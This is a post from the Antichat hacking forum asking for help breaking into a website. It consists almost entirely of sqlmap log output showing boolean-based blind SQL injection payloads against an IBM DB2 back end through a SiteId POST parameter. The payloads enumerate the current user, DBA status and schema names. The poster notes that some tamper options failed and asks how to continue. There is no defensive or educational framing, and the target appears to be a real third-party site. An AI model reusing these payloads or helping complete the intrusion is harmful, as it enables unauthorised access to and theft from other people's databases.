Форум АНТИЧАТ - Показать сообщение отдельно

Помогите раскрутить сайт

Parameter: SiteId (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Vector: AND [INFERENCE]
Код:
[14:07:25] [INFO] the back-end DBMS is IBM DB2
back-end DBMS: IBM DB2
[14:07:25] [INFO] fetching current user
[14:07:25] [PAYLOAD] 200001
[14:07:25] [INFO] retrieving the length of query output
[14:07:25] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'PPkh'='PPkh
[14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'PPkh'='PPkh
[14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'PPkh'='PPkh
[14:07:28] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'PPkh'='PPkh
[14:07:29] [INFO] retrieved:
[14:07:29] [DEBUG] performed 4 queries in 3.84 seconds
[14:07:29] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'PPkh'='PPkh
[14:07:30] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'PPkh'='PPkh
[14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'PPkh'='PPkh
[14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'PPkh'='PPkh
[14:07:34] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'PPkh'='PPkh
[14:07:36] [INFO] retrieved:
[14:07:36] [DEBUG] performed 9 queries in 10.87 seconds
current user:   None
[14:07:36] [INFO] testing if current user is DBA
current user is DBA:    True
[14:07:36] [WARNING] schema names are going to be used on IBM DB2 for enumeration as the counterpart to database names on other DBMSes
[14:07:36] [INFO] fetching database (schema) names
[14:07:36] [INFO] fetching number of databases
[14:07:36] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(66) AND 'MrxP'='MrxP
[14:07:39] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(97) AND 'MrxP'='MrxP
[14:07:42] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(101) AND 'MrxP'='MrxP
[14:07:43] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(119) AND 'MrxP'='MrxP
[14:07:44] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(120) AND 'MrxP'='MrxP
[14:07:45] [INFO] retrieved:
[14:07:45] [DEBUG] performed 5 queries in 8.49 seconds
[14:07:45] [ERROR] unable to retrieve the number of databases
[14:07:45] [INFO] falling back to current database
[14:07:45] [INFO] fetching current database
[14:07:45] [INFO] retrieving the length of query output
[14:07:45] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'SSnj'='SSnj
[14:07:46] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'SSnj'='SSnj
[14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'SSnj'='SSnj
[14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'SSnj'='SSnj
[14:07:48] [INFO] retrieved:
[14:07:48] [DEBUG] performed 4 queries in 3.55 seconds
[14:07:48] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'SSnj'='SSnj
[14:07:49] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'SSnj'='SSnj
[14:07:51] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'SSnj'='SSnj
[14:07:54] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'SSnj'='SSnj
[14:07:55] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'SSnj'='SSnj
[14:07:59] [INFO] retrieved:
[14:07:59] [DEBUG] performed 9 queries in 13.88 seconds
[14:07:59] [WARNING] on IBM DB2 you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[14:07:59] [CRITICAL] unable to retrieve the database names
[*] shutting down at 14:07:59
пробывал --hex, --no-cast, не помогает